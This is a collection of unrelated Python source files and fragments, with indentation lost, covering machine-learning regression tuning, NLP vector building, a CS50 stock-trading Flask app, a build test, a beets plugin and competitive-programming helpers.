BestSplit = j
BestLeaf = k
print(BestEst)
print(BestSplit)
print(BestScore)
print(BestLeaf)
XTreg = ExtraTreesRegressor(n_estimators=BestEst, criterion='mse', max_depth=None,
min_samples_split=BestSplit, min_samples_leaf=BestLeaf,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=False, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
XTreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = XTreg.predict(valid_x)
# Plot outputs
plt.figure()
XTregPlot = plt.scatter(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Extra Trees Regression Hyper Tuned')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_XTreg = XTreg.score(train_x, train_y)
print('Train_Score:',Train_Score_XTreg)
Test_Score_XTreg = XTreg.score(test_x, test_y)
print('Test_Score:',Test_Score_XTreg)
Valid_Score_XTreg = XTreg.score(valid_x, valid_y)
print('Valid_Score:',Valid_Score_XTreg)
Correlation_Coefficient_XTreg = np.corrcoef(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_XTreg)
plt.savefig('Extra Trees Regression Hyper Tuned.png')
plt.close()
# Random Forest Regression Hyperparameter Tuning
BestEst = 0
BestScore = 0
BestSplit = 0
BestLeaf = 0
for i in range(100,150,10):
for j in range(2,5,1):
for k in range(1,5,1):
RFreg = RandomForestRegressor(n_estimators=i, criterion='mse', max_depth=None,
min_samples_split=j, min_samples_leaf=k,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=True, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
RFreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = RFreg.predict(test_x)
Test_Score = RFreg.score(test_x, test_y)
if Test_Score>BestScore:
BestEst = i
BestScore = Test_Score
BestSplit = j
BestLeaf = k
print(BestEst)
print(BestSplit)
print(BestScore)
print(BestLeaf)
RFreg = RandomForestRegressor(n_estimators=BestEst, criterion='mse', max_depth=None,
min_samples_split=BestSplit, min_samples_leaf=BestLeaf,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=True, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
RFreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = RFreg.predict(valid_x)
# Plot outputs
plt.figure()
RFregPlot = plt.scatter(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Random Forest Regression Hyper Tuned')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_RFreg = RFreg.score(train_x, train_y)
print('Train_Score:',Train_Score_RFreg)
Test_Score_RFreg = RFreg.score(test_x, test_y)
print('Test_Score:',Test_Score_RFreg)
Valid_Score_RFreg = RFreg.score(valid_x, valid_y)
print('Valid_Score:',Valid_Score_RFreg)
Correlation_Coefficient_RFreg = np.corrcoef(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_RFreg)
plt.savefig('Random Forest Regression Hyper Tuned.png')
plt.close()
# Nearest Neighbor Regression Hyperparameter Tuning
Bestneigh = 0
BestScore = 0
BestLeaf = 0
BestP = 0
for i in range(2,10,1):
for j in range(30,70,10):
for k in range(2,5,1):
neighReg = KNeighborsRegressor(n_neighbors=i, weights='uniform', algorithm='auto',
leaf_size=j, p=k, metric='minkowski',
metric_params=None, n_jobs=None)
neighReg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = neighReg.predict(test_x)
Test_Score = neighReg.score(test_x, test_y)
if Test_Score>BestScore:
Bestneigh = i
BestScore = Test_Score
BestLeaf = j
BestP = k
print(Bestneigh)
print(BestScore)
print(BestLeaf)
print(BestP)
neighReg = KNeighborsRegressor(n_neighbors=Bestneigh, weights='uniform', algorithm='auto',
leaf_size=BestLeaf, p=BestP, metric='minkowski',
metric_params=None, n_jobs=None)
neighReg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = neighReg.predict(valid_x)
# Plot outputs
plt.figure()
neighRegPlot = plt.scatter(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Nearest Neighbor Regression Hyper Tuned')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_neighReg = neighReg.score(train_x, train_y)
print('Train_Score:',Train_Score_neighReg)
Test_Score_neighReg = neighReg.score(test_x, test_y)
print('Test_Score:',Test_Score_neighReg)
Valid_Score_neighReg = neighReg.score(valid_x, valid_y)
print('Valid_Score:',Valid_Score_neighReg)
Correlation_Coefficient_neighReg = np.corrcoef(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_neighReg)
plt.savefig('Nearest Neighbor Regression Hyper Tuned.png')
plt.close()
|
#square each ele and store in other lst
nums = [1,2,3,4,5,6,7,8,9]
lst=[]
for num in nums:
lst.append(num*num)
print(lst)
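# The same result as a list comprehension (equivalent, just more concise):
squares = [num * num for num in nums]
print(squares)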
|
import gensim
import numpy as np
import pandas as pd
from ..util import defines
from ..util import file_handling as fh
def main():
input_filename = fh.make_filename(defines.data_token_dir, 'ngrams_1_rnn_all', 'json')
response_tokens = fh.read_json(input_filename)
print "Building token set"
token_set = set()
for r in response_tokens:
token_set.update(response_tokens[r])
all_tokens = list(token_set)
print len(token_set), "tokens"
print "Loading brown clusters"
brown_cluster_filename = fh.make_filename(defines.vectors_dir, 'brown_vectors', 'json')
brown_clusters_data = fh.read_json(brown_cluster_filename)
print brown_clusters_data.keys()
brown_index = brown_clusters_data['index']
brown_vectors = brown_clusters_data['vectors']
brown_counts = brown_clusters_data['counts']
print "Inverting brown cluster index"
# invert the brown cluster index
brown_clusters = {}
for word in brown_index.keys():
code = brown_index[word]
if code in brown_clusters:
brown_clusters[code].append(word)
else:
brown_clusters[code] = [word]
# Load word2vec vectors
print "Loading vectors"
vector_file = defines.word2vec_vectors_filename
word2vec_vectors = gensim.models.Word2Vec.load_word2vec_format(vector_file, binary=True)
print "Computing weighted mean for unknown words"
# get weighted average vector for each cluster, based on its elements that have word2vec vectors
word2vec_dim = 300
mean_vectors = {}
for code in brown_clusters.keys():
vector = np.zeros(word2vec_dim)
count = 0
total_weight = 0
for word in brown_clusters[code]:
if word in word2vec_vectors:
weight = int(brown_counts[word])
vector += word2vec_vectors[word] * weight
count += 1
total_weight += weight
if count > 0:
vector /= float(total_weight)
else:
print code, "has no representatives in word2vec"
mean_vectors[code] = vector
print "Creating dictionary of final vectors"
final_vectors = pd.DataFrame(np.zeros([len(all_tokens), word2vec_dim]), index=all_tokens)
for word in all_tokens:
if word in word2vec_vectors:
final_vectors.loc[word] = word2vec_vectors[word]
elif word in brown_index:
final_vectors.loc[word] = mean_vectors[brown_index[word]]
print "Saving to file"
output_filename = fh.make_filename(defines.vectors_dir, 'brown_augmented_word2vec_300', 'csv')
final_vectors.to_csv(output_filename, header=False)
if __name__ == '__main__':
main()
|
#Szum.py
import numpy as nm
import matplotlib.pyplot as plt
def error_calc(lengthdata, noise_amp):
    """Count bit errors when a random +/-1 signal is corrupted by Gaussian noise of amplitude noise_amp."""
    b = nm.random.uniform(-1, 1, lengthdata)
signal = nm.zeros(lengthdata,float)
for i in range(len(b)):
if b[i] < 0:
signal[i] = -1
else:
signal[i]=1
noise = nm.random.randn(lengthdata)
rec_signal =signal + noise_amp *noise
detected_signal = nm.zeros(lengthdata,float)
for i in range(len(b)):
if rec_signal[i] < 0:
detected_signal[i]= -1
else:
detected_signal[i]=1
error_matrix = abs((detected_signal - signal)/2)
error = error_matrix.sum()
return error
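# Minimal usage sketch (assumed, not part of the original module): estimate the
# bit error rate for a few noise amplitudes and plot it on a log scale.
if __name__ == '__main__':
    n_bits = 10000
    amplitudes = [0.5, 0.75, 1.0, 1.5, 2.0]
    ber = [error_calc(n_bits, a) / n_bits for a in amplitudes]
    plt.semilogy(amplitudes, ber, 'o-')
    plt.xlabel('noise amplitude')
    plt.ylabel('bit error rate')
    plt.grid(True)
    plt.show()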
|
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session, url_for
from flask_session import Session
from passlib.apps import custom_app_context as pwd_context
from tempfile import gettempdir
import os
from helpers import *
# configure application
app = Flask(__name__)
# ensure responses aren't cached
if app.config["DEBUG"]:
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# custom filter
app.jinja_env.filters["usd"] = usd
# configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = gettempdir()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
app.secret_key = os.urandom(24)
@app.route("/")
@login_required
def index():
rows_portfolio = db.execute("SELECT symbol, company, SUM(shares) AS shares FROM portfolio WHERE id = :id GROUP BY company", id = session["user_id"])
total = 0
for row in range(len(rows_portfolio)):
rows_portfolio[row]["price"] = usd(lookup(rows_portfolio[row]["symbol"])["price"])
rows_portfolio[row]["total"] = usd(lookup(rows_portfolio[row]["symbol"])["price"] * rows_portfolio[row]["shares"])
total += lookup(rows_portfolio[row]["symbol"])["price"] * rows_portfolio[row]["shares"]
#deletes rows in rows_portfolio if there are 0 shares for that company
new_row = []
for row in range(len(rows_portfolio)):
if rows_portfolio[row]["shares"] != 0:
new_row.append(rows_portfolio[row])
user = db.execute("SELECT cash FROM users WHERE id = :id", id = session["user_id"])
cash = user[0]["cash"]
total += cash
total = usd(total)
cash = usd(cash)
return render_template("index.html", portfolio = new_row, cash = cash, total = total)
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock."""
if request.method == "POST":
#ensures proper usage
symbol = request.form.get("symbol")
if symbol == "":
return apology("Please Enter a Symbol")
elif lookup (symbol) == None:
return apology("Sorry stock not found")
elif request.form.get("shares") == None:
return apology("Please Enter Number of Shares")
elif RepresentsInt(request.form.get("shares")) == False:
return apology("Invalid input")
elif int(request.form.get("shares")) <= 0:
return apology("Please enter a positive number")
else:
row = db.execute("SELECT * FROM users WHERE id = :id", id = session["user_id"])
cash = row[0]["cash"]
price = lookup(request.form.get("symbol"))["price"]
company = lookup(request.form.get("symbol"))["name"]
shares = int(request.form.get("shares"))
symbol = lookup(symbol)["symbol"]
if shares * price <= cash:
db.execute("INSERT INTO portfolio (id, company, price, shares, symbol) VALUES (:id, :company, :price, :shares, :symbol )", id = session["user_id"], company = company, price = price, shares = shares, symbol = symbol)
cash -= price * shares
db.execute("UPDATE users SET cash =:cash WHERE id = :id", cash = cash, id = session["user_id"])
return redirect(url_for("index"))
else:
return apology ("Not enough money in your account")
return render_template("buy.html")
@app.route("/history")
@login_required
def history():
"""Show history of transactions."""
rows_history = db.execute("SELECT symbol, time_stamp, shares, price FROM portfolio WHERE id = :id ORDER BY time_stamp DESC", id = session["user_id"])
#if shares in database is negative it is sold, otherwise it is bought
#changes shares that are negative from database to positive for display
for row in range(len(rows_history)):
rows_history[row]["price"] = usd(rows_history[row]["price"])
if rows_history[row]["shares"] < 0:
rows_history[row]["action"] = "Sold"
rows_history[row]["shares"] = abs(rows_history[row]["shares"])
else:
rows_history[row]["action"] = "Bought"
return render_template("history.html", history = rows_history)
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in."""
# forget any user_id
session.clear()
# if user reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# ensure username was submitted
if not request.form.get("username"):
return apology("must provide username")
# ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password")
# query database for username
rows = db.execute("SELECT * FROM users WHERE username = :username", username=request.form.get("username"))
# ensure username exists and password is correct
if len(rows) != 1 or not pwd_context.verify(request.form.get("password"), rows[0]["hash"]):
return apology("invalid username and/or password")
# remember which user has logged in
session["user_id"] = rows[0]["id"]
# redirect user to home page
return redirect(url_for("index"))
# else if user reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out."""
# forget any user_id
session.clear()
# redirect user to login form
return redirect(url_for("login"))
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
if request.method == "POST":
if request.form.get("symbol") == "":
return apology("Please Enter a Symbol")
elif lookup (request.form.get("symbol")) == None:
return apology("Sorry stock not found")
else:
company = lookup(request.form.get("symbol"))["name"]
price = usd (lookup(request.form.get("symbol"))["price"])
symbol = lookup(request.form.get("symbol"))["symbol"]
return render_template("quoted.html", company = company, price =price, symbol = symbol)
return render_template("quote.html")
return apology("TODO")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user."""
session.clear()
if request.method == "POST":
if request.form.get("username") == "":
return apology("Please enter a username")
elif request.form.get("password") =="":
return apology("Please enter a password")
elif request.form.get("confirm_password") =="":
return apology("Please enter a confirmation password")
elif request.form.get("confirm_password") != request.form.get("password"):
return apology("Passwords don't match")
else:
hash = pwd_context.hash(request.form.get("password"))
result = db.execute("INSERT INTO users (username, hash) VALUES(:username, :hash)", username = request.form.get("username"), hash =hash)
if not result:
return apology ("User already registered")
row = db.execute("SELECT * FROM users WHERE username = :username", username=request.form.get("username"))
session ["user_id"] = row[0]["id"]
return redirect(url_for("index"))
else:
return render_template("register.html")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock."""
if request.method == "POST":
symbol = request.form.get("symbol")
if symbol == "":
return apology("Please Enter a Symbol")
elif lookup (symbol) == None:
return apology("Sorry stock not found")
elif request.form.get("shares") == "":
return apology("Please Enter Number of Shares")
elif RepresentsInt(request.form.get("shares")) == False:
return apology("Invalid input")
elif int(request.form.get("shares")) <= 0:
return apology("Please enter a positive number")
else:
portfolio = db.execute("SELECT symbol, company, SUM(shares) AS shares FROM portfolio WHERE id = :id GROUP BY symbol", id = session["user_id"])
user = db.execute("SELECT * FROM users WHERE id = :id ", id = session["user_id"])
symbol = lookup(symbol)["symbol"]
shares = int(request.form.get("shares"))
for row in range(len(portfolio)):
if symbol == portfolio[row]["symbol"]:
if shares <= portfolio[row]["shares"]:
cost = shares * lookup(symbol)["price"]
total = user[0]["cash"] + cost
company = lookup(symbol)["name"]
shares = -shares
price = lookup(symbol)["price"]
db.execute("UPDATE users SET cash= :cash WHERE id =:id", cash =total, id = session["user_id"])
db.execute("INSERT INTO portfolio (id, company, price, shares, symbol) VALUES (:id, :company, :price, :shares, :symbol )", id = session["user_id"], company = company, price = price, shares = shares, symbol = symbol)
return redirect(url_for("index"))
else:
return apology("You do not have enough shares")
else:
continue
return apology ("You do not have these shares")
return render_template("sell.html")
@app.route("/deposit", methods=["GET", "POST"])
@login_required
def deposit():
"""adds money to user account"""
if request.method == "POST":
if request.form.get("amount") == "":
return apology("Please enter amount")
elif representsFloat(request.form.get("amount")) == False:
return apology("Invalid Input")
elif float(request.form.get("amount")) <= 0:
return apology("Please enter a positive amount")
else:
user = db.execute("SELECT* FROM users WHERE id =:id ", id= session["user_id"])
cash = float(request.form.get("amount")) + user[0]["cash"]
db.execute("UPDATE users SET cash = :cash WHERE id=:id", cash = cash, id = session["user_id"])
return redirect(url_for("index"))
return render_template("deposit.html")
|
class Collection(object):
def __init__(self, update_func):
self._update_func = update_func
self._elements = None
def __dir__(self):
if self._elements is not None:
return self.__dict__
else:
self.refresh()
return self.__dict__
def __getitem__(self, item):
return self._elements[item]
def __getattr__(self, item):
if self._elements is None:
self.refresh()
elif item in ["_ipython_canary_method_should_not_exist_", "_repr_mimebundle_"]:
raise AttributeError
return self._elements[item]
def __repr__(self):
items = ("{!r}".format(self._elements[k]) for k in self._elements)
return "\n{}\n".format("\n".join(items))
def __eq__(self, other):
        return self.__dict__ == other.__dict__
def refresh(self):
self._elements = self._update_func()
self.__dict__.update(self._elements)
def __iter__(self):
if self._elements is None:
self.refresh()
return iter(self._elements.values())
def __contains__(self, key):
if self._elements is None:
self.refresh()
return key in self._elements
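# Hypothetical usage sketch (the names below are illustrative, not from the
# original code): the collection lazily calls its update function on first
# access and caches the resulting elements.
if __name__ == "__main__":
    coll = Collection(lambda: {"alpha": 1, "beta": 2})
    print(coll.alpha)        # first access triggers refresh()
    print("beta" in coll)    # True
    print(list(coll))        # [1, 2]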
|
def finite_iteration():
companies = [
'google',
'ibm',
'adobe',
'nike',
'target',
]
def infinite_iteration():
    # Placeholder: no iteration implemented here yet.
    pass

if __name__ == "__main__":
    finite_iteration()
    infinite_iteration()
|
import os
import sys
from torch import nn
import time
import pdb
sys.path.append('../..')
from fastreid.config import get_cfg
from fastreid.engine import DefaultTrainer, default_argument_parser, default_setup
from fastreid.utils.checkpoint import Checkpointer
from fastreid.evaluation import ReidEvaluator
from build import build_reid_test_loader, build_reid_train_loader
class Trainer(DefaultTrainer):
@classmethod
def build_evaluator(cls, cfg, num_query, output_folder=None):
if output_folder is None:
output_folder = os.path.join(cfg.OUTPUT_DIR, "inference")
return ReidEvaluator(cfg, num_query)
@classmethod
def build_train_loader(cls, cfg):
return build_reid_train_loader(cfg)
@classmethod
def build_test_loader(cls, cfg, dataset_name):
return build_reid_test_loader(cfg, dataset_name)
def run_step(self):
"""
Implement the standard training logic described above.
"""
assert self.model.training, "[SimpleTrainer] model was changed to eval mode!"
start = time.perf_counter()
"""
        If you want to do something with the data, you can wrap the dataloader.
"""
data = self.data_loader.next()
data_time = time.perf_counter() - start
"""
        If you want to do something with the heads, you can wrap the model.
"""
outputs = self.model(data)
loss_dict = self.model.module.losses(outputs,self.iter)
losses = sum(loss for loss in loss_dict.values())
self._detect_anomaly(losses, loss_dict)
metrics_dict = loss_dict
metrics_dict["data_time"] = data_time
self._write_metrics(metrics_dict)
"""
If you need accumulate gradients or something similar, you can
wrap the optimizer with your custom `zero_grad()` method.
"""
self.optimizer.zero_grad()
losses.backward()
"""
If you need gradient clipping/scaling or other processing, you can
wrap the optimizer with your custom `step()` method.
"""
self.optimizer.step()
def setup(args):
"""
Create configs and perform basic setups.
"""
cfg = get_cfg()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
default_setup(cfg, args)
return cfg
def main(args):
cfg = setup(args)
if args.eval_only:
cfg.defrost()
cfg.MODEL.BACKBONE.PRETRAIN = False
model = Trainer.build_model(cfg)
model = nn.DataParallel(model)
model = model.cuda()
Checkpointer(model, save_dir=cfg.OUTPUT_DIR).load(cfg.MODEL.WEIGHTS)
res = Trainer.test(cfg, model)
return res
trainer = Trainer(cfg)
trainer.resume_or_load(resume=args.resume)
return trainer.train()
if __name__ == "__main__":
args = default_argument_parser().parse_args()
print("Command Line Args:", args)
main(args)
|
class GlaesError(Exception): pass
|
from rest_framework import routers
from .views import CategoryModelViewSet
router = routers.SimpleRouter()
router.register(r'categories', CategoryModelViewSet)
urlpatterns = router.urls
|
from accounts.models import Address
from django.shortcuts import render_to_response
from dajax.core.Dajax import Dajax
def addresses_by_user(request,user_id):
addresses=Address.objects.filter(user__id=user_id)
dajax = Dajax()
dajax.alert('123')
return dajax.json()
|
def count(L, S):
    """Count the (possibly overlapping) occurrences of S in L."""
    diff = len(L) - len(S)
if diff < 0:
return 0
cnt = 0
for i in range(diff+1):
if S == L[i:i+len(S)]:
cnt += 1
return cnt
while True:
try:
S, L = input().split()
        s1 = count(L, S)  # exact occurrences of S in L
        # occurrences of every string obtained by deleting one character from S
        s2 = sum([count(L, s) for s in set([S[:i] + S[i+1:] for i in range(len(S))])])
        # occurrences of every string obtained by inserting one of A/G/C/T into S
        s3 = sum([count(L, s) for s in set([S[:i] + c + S[i:] for i, c in zip(list(range(len(S)+1))*4, ["A"]*(len(S)+1) + ["G"]*(len(S)+1) + ["C"]*(len(S)+1) + ["T"]*(len(S)+1))])])
print("{} {} {}".format(s1, s2, s3))
except:
break
|
#coding:utf-8
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
from sklearn.model_selection import GridSearchCV
import matplotlib.pyplot as plt
def show_data(y, y_pred, title):
plt.figure(figsize=(7, 6), facecolor='w')
plt.plot(y, 'r-', lw=2, label='Actual')
plt.plot(y_pred, 'g-', lw=1, label='Predict', alpha=0.7)
plt.grid(True)
plt.xlabel('Samples', fontsize=15)
plt.ylabel('Field Intensity', fontsize=15)
plt.legend(loc='upper left')
plt.title(title, fontsize=18)
plt.tight_layout()
if __name__ == '__main__':
data_prime = pd.read_csv('FieldIntensity.csv', header=0)
data_group = data_prime.groupby(by=['x', 'y'])
data_mean = data_group.mean()
data = data_mean.reset_index()
print data
x = data[['x', 'y']]
y = data['88000KHz']
x_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.75, random_state=0)
# rf = RandomForestRegressor(n_estimators=100, criterion='mse', max_depth=11, min_samples_split=3)
# model = GridSearchCV(rf, param_grid={'max_depth': np.arange(10, 15), 'min_samples_split': np.arange(1, 5)})
model = RandomForestRegressor(n_estimators=100, criterion='mse', max_depth=14, min_samples_split=3)
model.fit(x_train, y_train)
order = y_train.argsort(axis=0)
y_train = y_train.values[order]
x_train = x_train.values[order, :]
y_train_pred = model.predict(x_train)
order = y_test.argsort(axis=0)
y_test = y_test.values[order]
x_test = x_test.values[order, :]
y_test_pred = model.predict(x_test)
print r2_score(y_train, y_train_pred)
print r2_score(y_test, y_test_pred)
show_data(y_train, y_train_pred, 'Train Data')
show_data(y_test, y_test_pred, 'Test Data')
plt.show()
|
# -*- python -*-
# Assignment: Stars
# Write the following functions.
# Part I
# Create a function called draw_stars() that takes a list of numbers and prints out *.
#
# For example:
# x = [4, 6, 1, 3, 5, 7, 25]
# draw_stars(x)
# Should print the following:
# ****
# ******
# *
# ***
# *****
# *******
# *************************
def draw_stars( l ):
for i in l:
print '*' * i
print "Testing draw_stars ..."
draw_stars( [4, 6, 1, 3, 5, 7, 25] )
print "End testing draw_stars"
# Part II
# Modify the function above. Allow a list containing integers and strings to be
# passed to the draw_stars() function.
# When a string is passed, instead of displaying *, display the first letter of
# the string according to the example below.
# You may use the .lower() string method for this part.
#
# For example:
# x = [4, "Tom", 1, "Michael", 5, 7, "Jimmy Smith"]
# draw_stars(x)
# Should print the following:
# ****
# ttt
# *
# mmmmmmm
# *****
# *******
# jjjjjjjjjjj
def draw_stars_and_letters( l ):
for i in l:
if type( i ) == int:
print '*' * i
elif type( i ) == str:
print i[0].lower() * len( i )
print "Testing draw_stars_and_letters ..."
draw_stars_and_letters( [4, "Tom", 1, "Michael", 5, 7, "Jimmy Smith"] )
print "End testing draw_stars_and_letters"
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies simple build of a "Hello, world!" program with static libraries,
including verifying that libraries are rebuilt correctly when functions
move between libraries.
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('library.gyp',
'-Dlibrary=static_library',
'-Dmoveable_function=lib1',
chdir='src')
test.relocate('src', 'relocate/src')
test.build('library.gyp', test.ALL, chdir='relocate/src')
expect = """\
Hello from program.c
Hello from lib1.c
Hello from lib2.c
Hello from lib1_moveable.c
"""
test.run_built_executable('program', chdir='relocate/src', stdout=expect)
test.run_gyp('library.gyp',
'-Dlibrary=static_library',
'-Dmoveable_function=lib2',
chdir='relocate/src')
# Update program.c to force a rebuild.
test.sleep()
contents = test.read('relocate/src/program.c')
contents = contents.replace('Hello', 'Hello again')
test.write('relocate/src/program.c', contents)
test.build('library.gyp', test.ALL, chdir='relocate/src')
expect = """\
Hello again from program.c
Hello from lib1.c
Hello from lib2.c
Hello from lib2_moveable.c
"""
test.run_built_executable('program', chdir='relocate/src', stdout=expect)
test.run_gyp('library.gyp',
'-Dlibrary=static_library',
'-Dmoveable_function=lib1',
chdir='relocate/src')
# Update program.c and lib2.c to force a rebuild.
test.sleep()
contents = test.read('relocate/src/program.c')
contents = contents.replace('again', 'again again')
test.write('relocate/src/program.c', contents)
# TODO(sgk): we have to force a rebuild of lib2 so that it weeds out
# the "moved" module. This should be done in gyp by adding a dependency
# on the generated .vcproj file itself.
test.touch('relocate/src/lib2.c')
test.build('library.gyp', test.ALL, chdir='relocate/src')
expect = """\
Hello again again from program.c
Hello from lib1.c
Hello from lib2.c
Hello from lib1_moveable.c
"""
test.run_built_executable('program', chdir='relocate/src', stdout=expect)
test.pass_test()
|
from enum import Enum
class PullRequestState(Enum):
OPEN = 'OPEN'
CLOSED = 'CLOSED'
MERGED = 'MERGED'
class ReviewDecision(Enum):
NACK = 'NACK'
CONCEPT_ACK = 'CONCEPT_ACK'
UNTESTED_ACK = 'UNTESTED_ACK'
TESTED_ACK = 'TESTED_ACK'
NONE = None
|
'''
It is recommended to use four spaces per indentation level: this improves
readability while leaving enough room for multiple levels of indentation.
Keep each line to no more than 80 characters.
Keep comment lines to no more than 72 characters.
Use blank lines to separate the different parts of a program.
'''
|
# This file is part of beets.
# Copyright 2021, Edgars Supe.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Adds an album template field for formatted album types."""
from beets.autotag.mb import VARIOUS_ARTISTS_ID
from beets.library import Album
from beets.plugins import BeetsPlugin
class AlbumTypesPlugin(BeetsPlugin):
"""Adds an album template field for formatted album types."""
def __init__(self):
"""Init AlbumTypesPlugin."""
super().__init__()
self.album_template_fields['atypes'] = self._atypes
self.config.add({
'types': [
('ep', 'EP'),
('single', 'Single'),
('soundtrack', 'OST'),
('live', 'Live'),
('compilation', 'Anthology'),
('remix', 'Remix')
],
'ignore_va': ['compilation'],
'bracket': '[]'
})
def _atypes(self, item: Album):
"""Returns a formatted string based on album's types."""
types = self.config['types'].as_pairs()
ignore_va = self.config['ignore_va'].as_str_seq()
bracket = self.config['bracket'].as_str()
# Assign a left and right bracket or leave blank if argument is empty.
if len(bracket) == 2:
bracket_l = bracket[0]
bracket_r = bracket[1]
else:
bracket_l = ''
bracket_r = ''
res = ''
albumtypes = item.albumtypes
is_va = item.mb_albumartistid == VARIOUS_ARTISTS_ID
for type in types:
if type[0] in albumtypes and type[1]:
if not is_va or (type[0] not in ignore_va and is_va):
res += f'{bracket_l}{type[1]}{bracket_r}'
return res
|
def getN():
return int(input())
def getNM():
return map(int, input().split())
def getList():
return list(map(int, input().split()))
def getArray(intn):
return [int(input()) for i in range(intn)]
def input():
return sys.stdin.readline().rstrip()
def rand_N(ran1, ran2):
return random.randint(ran1, ran2)
def rand_List(ran1, ran2, rantime):
return [random.randint(ran1, ran2) for i in range(rantime)]
def rand_ints_nodup(ran1, ran2, rantime):
ns = []
while len(ns) < rantime:
n = random.randint(ran1, ran2)
if not n in ns:
ns.append(n)
return sorted(ns)
def rand_query(ran1, ran2, rantime):
r_query = []
while len(r_query) < rantime:
n_q = rand_ints_nodup(ran1, ran2, 2)
if not n_q in r_query:
r_query.append(n_q)
return sorted(r_query)
from collections import defaultdict, deque, Counter
from sys import exit
from decimal import *
import heapq
import math
from fractions import gcd
import random
import string
import copy
from itertools import combinations, permutations, product
from operator import mul
from functools import reduce
from bisect import bisect_left, bisect_right
import sys
sys.setrecursionlimit(1000000000)
mod = 10 ** 9 + 7
#############
# Main Code #
#############
import sys
sys.setrecursionlimit(1000000)
class LCA(object):
def __init__(self, G, root=0):
self.G = G
self.root = root
self.n = len(G)
self.logn = (self.n - 1).bit_length()
self.depth = [-1 if i != root else 0 for i in range(self.n)]
self.parent = [[-1] * self.n for _ in range(self.logn)]
        self.go = [] # pre-order (entering) visit order
        # self.go_dict = {}
        self.back = [] # post-order (leaving) visit order
self.back_dict = {}
self.bfs()
self.doubling()
def bfs(self):
que = [self.root]
while que:
u = que.pop()
for v in self.G[u]:
if self.depth[v] == -1:
self.depth[v] = self.depth[u] + 1
self.parent[0][v] = u
que += [v]
def dfs(self, u, p):
# self.go_dict[u] = len(self.go)
self.go.append(u)
for v in E[u]:
if v != p:
self.dfs(v, u)
self.back_dict[u] = len(self.back)
self.back.append(u)
def doubling(self):
for i in range(1, self.logn):
for v in range(self.n):
if self.parent[i - 1][v] != -1:
self.parent[i][v] = self.parent[i - 1][self.parent[i - 1][v]]
def get(self, u, v):
if self.depth[v] < self.depth[u]:
u, v = v, u
du = self.depth[u]
dv = self.depth[v]
        for i in range(self.logn): # lift the deeper node by the depth difference
if (dv - du) >> i & 1:
v = self.parent[i][v]
        if u == v: return u # done if they already coincide once depths are equal
        for i in range(self.logn - 1, -1, -1): # otherwise binary-search upward from the highest bit
pu, pv = self.parent[i][u], self.parent[i][v]
if pu != pv:
u, v = pu, pv
return self.parent[0][u]
